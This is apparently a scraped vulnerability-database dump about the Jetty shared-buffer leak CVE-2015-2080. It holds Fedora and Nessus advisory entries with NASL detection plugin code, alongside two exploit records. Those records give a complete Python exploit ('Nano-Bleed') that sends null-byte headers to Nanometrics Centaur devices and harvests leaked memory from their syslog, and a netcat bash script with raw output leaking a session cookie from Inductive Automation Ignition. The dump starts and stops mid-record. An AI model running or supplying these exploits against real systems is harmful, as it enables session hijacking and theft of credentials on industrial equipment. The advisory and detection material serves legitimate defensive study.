byteGoblin \nO,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk \nKdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \nd;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca \nOddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA \nd...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 \n0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK \n0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A \n0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \nx:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product \nXx:,'':xk:..,''lK Y k;';;';xX \nXOkkko'.....'O d.';;,,:xN \n0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ \nXOkkkkkON \n\"\"\" \nprint(goblin) \n \ndef generate_payload(self, amount_of_bytes): \nself.payload += \"\\x00\" * amount_of_bytes \nself.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload} \n \ndef read_syslog(self, initial=False): \n# Read syslog remotely and filter out 'HeapByteBuffer' messages. \n# 'initial' is used to make a 'snapshot' of the state before we send payloads... \n# That way we can filter on what we've just sent. \nprint(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog)) \nbuffer = \"\" \nr = requests.get(self.host + self.syslog) \nif r.status_code == 200: \nprint(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content))) \nsplit = r.text.split(\"\\n\") \nfor line in split: \nif \"HeapByteBuffer\" in line: \nif initial: \nself.last_line = line \nelse: \nif line == self.last_line: \nself.before_last_line = False \nif not self.before_last_line: \nbuffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\") \ntry: \nleak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\") \nbuffer += leak \nexcept Exception as e: \nprint(e) \nif initial: \nreturn self.last_line \nself.buffer = buffer \nelse: # we can't access syslog? \nprint(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\") \nprint(\"[!!!] - The status code we got was: {}\".format(r.status_code)) \nexit(-1) \n \ndef show_output(self): \n# we need to translate '\\r\\n' into actual newlines \nif self.buffer is not None and self.buffer is not \"\": \nself.buffer = self.buffer.replace(\"\\\\n\", \"\\n\") \nself.buffer = self.buffer.replace(\"\\\\r\", \"\\r\") \nself.buffer = self.buffer.replace(\"%2f\", \"/\") \n \nprint(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer))) \nprint(\"=\" * 50) \nprint(\"[*] THIS IS THE LOOT\") \nprint(\"=\" * 50) \nfor num, x in enumerate(self.buffer.split(\"\\n\")): \nprint(\"{}.\\t| \\t{}\".format(num, x)) \n \ndef send_payload(self, amount): \nprint(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page)) \nif amount > self.payloads_to_send or amount < 0: \namount = self.payloads_to_send \nfor num, x in enumerate(range(0, amount)): \nif num % 10 == 0: \nprint(\"[!] - [{}/{}] payloads sent...\".format(num, amount)) \ntry: \nself.generate_payload(17) \nr = requests.post(self.host + self.page, data=self.body, headers=self.headers) \nexcept Exception as e: \nprint(e) \nprint(\"[!] - [{}/{}] payloads sent...\".format(amount, amount)) \n \ndef parse_sys_args(self): \nif len(sys.argv) >= 2: \nself.host = sys.argv[1] \nif not \"http\" in self.host: \nself.host = \"http://{}\".format(self.host) \nif len(sys.argv) == 3: \n# amount of packets to send \nself.payloads_to_send = sys.argv[2] \nelse: \nself.print_help() \n \ndef print_help(self): \nprint(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0])) \nprint(\"Example: centaur3.py 123.456.789.0:8080 200\") \nprint(\"\\tThis will send 200 payloads to the aforementioned host\") \nprint(\"\\tThe [port] and [amount of payloads] are optional\") \nexit(-1) \n \ndef main(self): \nself.parse_sys_args() \nself.banner() \nll = self.read_syslog(initial=True) \nself.send_payload(70) \nself.read_syslog() \nself.show_output() \n \nif __name__ == '__main__': \nGoblin().main() \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/156414/nanometricscentaur4323-leak.txt"}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2080"], "description": " Jetty is a 100% Java HTTP Server and Servlet Container. This means that you do not need to configure and run a separate web server (like Apache) in ord er to use Java, servlets and JSPs to generate dynamic content. Jetty is a fully featured web server for static and dynamic content. Unlike separate server/container solutions, this means that your web server and web application run in the same process, without interconnection overheads and complications. Furthermore, as a pure java component, Jetty can be simp ly included in your application for demonstration, distribution or deployment. Jetty is available on all Java supported platforms. ", "modified": "2015-03-13T17:28:20", "published": "2015-03-13T17:28:20", "id": "FEDORA:73DD962CD8C7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: jetty-9.2.9-1.fc22", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-12T10:13:28", "description": "Rebase to upstream version 9.2.9, resolves CVE-2015-2080 security\nvulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2015-03-17T00:00:00", "title": "Fedora 22 : jetty-9.2.9-1.fc22 (2015-2673)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2080"], "modified": "2015-03-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:jetty", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-2673.NASL", "href": "https://www.tenable.com/plugins/nessus/81841", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-2673.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81841);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-2080\");\n script_xref(name:\"FEDORA\", value:\"2015-2673\");\n\n script_name(english:\"Fedora 22 : jetty-9.2.9-1.fc22 (2015-2673)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to upstream version 9.2.9, resolves CVE-2015-2080 security\nvulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1196254\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151804.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44a1ecbc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected jetty package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jetty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"jetty-9.2.9-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jetty\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T03:19:13", "description": "The remote instance of Jetty is affected by a remote memory disclosure\nvulnerability in the HttpParser module due to incorrect handling of\nillegal characters in header values. When an illegal character is\nencountered in an HTTP request, Jetty writes a response in a shared\nbuffer that was used in a previous request. Jetty's response to the\nclient includes this shared buffer which contains potentially\nsensitive data from the previous request. An attacker, using specially\ncrafted requests containing variable length strings of illegal\ncharacters, can steal sensitive header data (e.g. cookies,\nauthentication tokens) or sensitive POST data (e.g. credentials).", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2015-02-27T00:00:00", "title": "Jetty HttpParser Error Remote Memory Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2080"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mortbay:jetty"], "id": "JETTY_CVE-2015-2080.NASL", "href": "https://www.tenable.com/plugins/nessus/81576", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81576);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2015-2080\");\n script_bugtraq_id(72768);\n\n script_name(english:\"Jetty HttpParser Error Remote Memory Disclosure\");\n script_summary(english:\"Checks for a remote memory disclosure flaw.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote memory disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote instance of Jetty is affected by a remote memory disclosure\nvulnerability in the HttpParser module due to incorrect handling of\nillegal characters in header values. When an illegal character is\nencountered in an HTTP request, Jetty writes a response in a shared\nbuffer that was used in a previous request. Jetty's response to the\nclient includes this shared buffer which contains potentially\nsensitive data from the previous request. An attacker, using specially\ncrafted requests containing variable length strings of illegal\ncharacters, can steal sensitive header data (e.g. cookies,\nauthentication tokens) or sensitive POST data (e.g. credentials).\");\n # https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8e07913\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.eclipse.org/bugs/show_bug.cgi?id=460642\");\n # https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f918c477\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Jetty 9.2.9.v20150224 or later. For Jetty 9.3.x, contact\nthe vendor for a solution.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-2080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mortbay:jetty\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default: 8080);\n\n# Unless we're paranoid, make sure the banner looks like Jetty.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (isnull(banner) || \"Server: Jetty(\" >!< banner)\n audit(AUDIT_WRONG_WEB_SERVER, port, \"Jetty\");\n}\n\nresponse = http_send_recv3(\n method: \"GET\",\n item:\"/\",\n port:port,\n add_headers: make_array(\"Nessus-Header\", '\\x00')\n);\n\nif (isnull(response))\n audit(AUDIT_RESP_NOT, port, \"HTTP GET\");\n\nif (\"Illegal character 0x0 in state\" >!< response[0])\n audit(AUDIT_LISTEN_NOT_VULN, \"web server\", port);\n\nrequest = http_last_sent_request();\n\nrequest = str_replace(string:request, find:'\\x00', replace:\"\\x00\", count:1);\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n generic : TRUE,\n line_limit : 5,\n request : make_list(request),\n output : data_protection::sanitize_user_full_redaction(output:chomp(response[0]))\n);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:25", "description": "\nNanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak", "edition": 1, "published": "2020-02-19T00:00:00", "title": "Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2020-02-19T00:00:00", "id": "EXPLOITPACK:8381C100449907A0334DEEC7E23A5C2A", "href": "", "sourceData": "# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak\n# Date: 2020-02-15\n# Author: byteGoblin\n# Vendor: https://www.nanometrics.ca\n# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma\n# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder\n# CVE: N/A\n#\n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit\n#\n#\n# Vendor: Nanometrics Inc.\n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma\n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder\n#\n# Affected versions:\n# Centaur <= 4.3.23\n# TitanSMA <= 4.2.20\n#\n# Summary:\n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists\n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.\n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and\n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for\n# infrasound and similar geophysical sensor recording applications requiring sample rates up to\n# 5000 sps.\n#\n# Summary:\n# The TitanSMA is a strong motion accelerograph designed for high precision observational and\n# structural engineering applications, where scientists and engineers require exceptional dynamic\n# range over a wide frequency band.\n#\n# Description:\n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect\n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT)\n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.\n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage.\n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP\n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system\n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent\n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking\n# and authentication bypass scenarios.\n#\n# Tested on:\n# Jetty 9.4.z-SNAPSHOT\n#\n# Vulnerability discovered by:\n# byteGoblin @ zeroscience.mk\n#\n#\n# Advisory ID: ZSL-2020-5562\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php\n#\n# Related CVE: CVE-2015-2080\n# Related CWE: CWE-532, CWE-538\n#\n# 10.02.2020\n#\n\n#!/usr/bin/env python3\n\nimport requests\nimport re\nimport sys\n\nclass Goblin:\n def __init__(self):\n self.host = None\n self.page = \"/zsl\"\n self.syslog = \"/logs/syslog\"\n self.buffer_pad = \"A\" * 70\n self.buffer = None\n self.payload = \"\\xFF\"\n self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results\n self.body = {}\n self.headers = None\n self.syslog_data = {}\n self.last_line = None\n self.before_last_line = True\n\n def banner(self):\n goblin = \"\"\"\n NN \n NkllON \n 0;;::k000XN KxllokN \n 0;,:,;;;;:ldK Kdccc::oK \n Nx,';codddl:::dkdc:c:;lON \n klc:clloooooooc,.':lc;'lX \n x;:ooololccllc:,:ll:,:xX \n Kd:cllc'..';:ccclc,.x _ . ___ _ . \n NOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \n Nklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `.\n 0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | |\n 0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / |\n Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \n Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed//\n XxclkXk;'::,,,''';:::;'''...'',:o0 \n Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin\n O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk\n Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \n d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca\n Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA\n d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20\n 0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK\n 0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A\n 0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php\n :,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \n x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product\n Xx:,'':xk:..,''lK Y k;';;';xX \n XOkkko'.....'O d.';;,,:xN\n 0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._\n XOkkkkkON \n \"\"\"\n print(goblin)\n\n def generate_payload(self, amount_of_bytes):\n self.payload += \"\\x00\" * amount_of_bytes\n self.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload}\n\n def read_syslog(self, initial=False):\n # Read syslog remotely and filter out 'HeapByteBuffer' messages.\n # 'initial' is used to make a 'snapshot' of the state before we send payloads...\n # That way we can filter on what we've just sent.\n print(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog))\n buffer = \"\"\n r = requests.get(self.host + self.syslog)\n if r.status_code == 200:\n print(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content)))\n split = r.text.split(\"\\n\")\n for line in split:\n if \"HeapByteBuffer\" in line:\n if initial:\n self.last_line = line\n else:\n if line == self.last_line:\n self.before_last_line = False\n if not self.before_last_line:\n buffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\")\n try:\n leak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\")\n buffer += leak\n except Exception as e:\n print(e)\n if initial:\n return self.last_line\n self.buffer = buffer\n else: # we can't access syslog?\n print(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\")\n print(\"[!!!] - The status code we got was: {}\".format(r.status_code))\n exit(-1)\n\n def show_output(self):\n # we need to translate '\\r\\n' into actual newlines\n if self.buffer is not None and self.buffer is not \"\":\n self.buffer = self.buffer.replace(\"\\\\n\", \"\\n\")\n self.buffer = self.buffer.replace(\"\\\\r\", \"\\r\")\n self.buffer = self.buffer.replace(\"%2f\", \"/\")\n\n print(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer)))\n print(\"=\" * 50)\n print(\"[*] THIS IS THE LOOT\")\n print(\"=\" * 50)\n for num, x in enumerate(self.buffer.split(\"\\n\")):\n print(\"{}.\\t| \\t{}\".format(num, x))\n\n def send_payload(self, amount):\n print(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page))\n if amount > self.payloads_to_send or amount < 0:\n amount = self.payloads_to_send\n for num, x in enumerate(range(0, amount)):\n if num % 10 == 0:\n print(\"[!] - [{}/{}] payloads sent...\".format(num, amount))\n try:\n self.generate_payload(17)\n r = requests.post(self.host + self.page, data=self.body, headers=self.headers)\n except Exception as e:\n print(e)\n print(\"[!] - [{}/{}] payloads sent...\".format(amount, amount))\n\n def parse_sys_args(self):\n if len(sys.argv) >= 2:\n self.host = sys.argv[1]\n if not \"http\" in self.host:\n self.host = \"http://{}\".format(self.host)\n if len(sys.argv) == 3:\n # amount of packets to send\n self.payloads_to_send = sys.argv[2]\n else:\n self.print_help()\n\n def print_help(self):\n print(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0]))\n print(\"Example: centaur3.py 123.456.789.0:8080 200\")\n print(\"\\tThis will send 200 payloads to the aforementioned host\")\n print(\"\\tThe [port] and [amount of payloads] are optional\")\n exit(-1)\n\n def main(self):\n self.parse_sys_args()\n self.banner()\n ll = self.read_syslog(initial=True)\n self.send_payload(70)\n self.read_syslog()\n self.show_output()\n\nif __name__ == '__main__':\n Goblin().main()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:21", "description": "\nInductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers", "edition": 1, "published": "2016-02-17T00:00:00", "title": "Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2016-02-17T00:00:00", "id": "EXPLOITPACK:FFA957BFC443828CD6A7FF5B6E85B3EA", "href": "", "sourceData": "Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers\nVendor: Inductive Automation\nProduct web page: http://www.inductiveautomation.com\nAffected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)\nPlatform: Java\n\nSummary: Ignition is a powerful industrial application platform with\nfully integrated development tools for building SCADA, MES, and IIoT\nsolutions.\n\nDesc: Remote unauthenticated atackers are able to read arbitrary data\nfrom other HTTP sessions because Ignition uses a vulnerable Jetty server.\nWhen the Jetty web server receives a HTTP request, the below code is used\nto parse through the HTTP headers and their associated values. The server\nbegins by looping through each character for a given header value and checks\nthe following:\n\n- On Line 1164, the server checks if the character is printable ASCII or\nnot a valid ASCII character.\n- On Line 1172, the server checks if the character is a space or tab.\n- On Line 1175, the server checks if the character is a line feed.\n- If the character is non-printable ASCII (or less than 0x20), then all\nof the checks above are skipped over and the code throws an \u00ebIllegalCharacter\u00ed\nexception on line 1186, passing in the illegal character and a shared buffer.\n\n\n---------------------------------------------------------------------------\nFile: jetty-http\\src\\main\\java\\org\\eclipse\\jetty\\http\\HttpParser.java\n---------------------------------------------------------------------------\n920: protected boolean parseHeaders(ByteBuffer buffer)\n921: {\n[..snip..]\n1163: case HEADER_VALUE:\n1164: if (ch>HttpTokens.SPACE || ch<0)\n1165: {\n1166: _string.append((char)(0xff&ch));\n1167: _length=_string.length();\n1168: setState(State.HEADER_IN_VALUE);\n1169: break;\n1170: }\n1171:\n1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)\n1173: break;\n1174:\n1175: if (ch==HttpTokens.LINE_FEED)\n1176: {\n1177: if (_length > 0)\n1178: {\n1179: _value=null;\n1180: _valueString=(_valueString==null)?takeString():(_valueString+\" \"+takeString());\n1181: }\n1182: setState(State.HEADER);\n1183: break;\n1184: }\n1185:\n1186: throw new IllegalCharacter(ch,buffer);\n---------------------------------------------------------------------------\n\n\nTested on: Microsoft Windows 7 Professional SP1 (EN)\n Microsoft Windows 7 Ultimate SP1 (EN)\n Ubuntu Linux 14.04\n Mac OS X\n HP-UX Itanium\n Jetty(9.2.z-SNAPSHOT)\n Java/1.8.0_73\n Java/1.8.0_66\n\n\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2016-5306\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php\n\nCVE: CVE-2015-2080\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080\n\nOriginal: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\nJetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py\nEclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md\n https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md\n\n\n14.01.2016\n\n---\n\n\n#######################\n#!/bin/bash\n\n#RESOURCEPATH=\"/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo\"\nRESOURCEPATH=\"/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo\"\nBAD=$'\\a'\n\nfunction normalRequest {\necho \"-- Normal Request --\"\n\nnc localhost 8088 << NORMREQ\nPOST $RESOURCEPATH HTTP/1.1\nHost: localhost\nContent-Type: application/x-www-form-urlencoded;charset=utf-8\nConnection: close\nContent-Length: 63\n\nNORMREQ\n}\n\nfunction badCookie {\necho \"-- Bad Cookie --\"\n\nnc localhost 8088 << BADCOOKIE\nGET $RESOURCEPATH HTTP/1.1\nHost: localhost\nCoo${BAD}kie: ${BAD}\n\nBADCOOKIE\n}\n\nnormalRequest\necho \"\"\necho \"\"\nbadCookie\n\n#######################\n\n\n\nOriginal raw analysis request via proxy using Referer:\n------------------------------------------------------\n\nGET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1\nHost: localhost:8088\nAccept: application/xml, text/xml, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nWicket-Ajax: true\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\nWicket-Ajax-BaseURL: config/conf.modules?51461\nReferer: \\x00\n\n\nResponse leaking part of Cookie session:\n----------------------------------------\n\nHTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\\r\\nReferer: \\x00<<<\\r\\nAccept-Encoding...tion: close\\r\\n\\r\\n>>>SESSIONID=15iwe0g...\\x0fCU\\xFa\\xBf\\xA4j\\x12\\x83\\xCb\\xE61~S\\xD1'\nContent-Length: 0\nConnection: close\nServer: Jetty(9.2.z-SNAPSHOT)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:36:17", 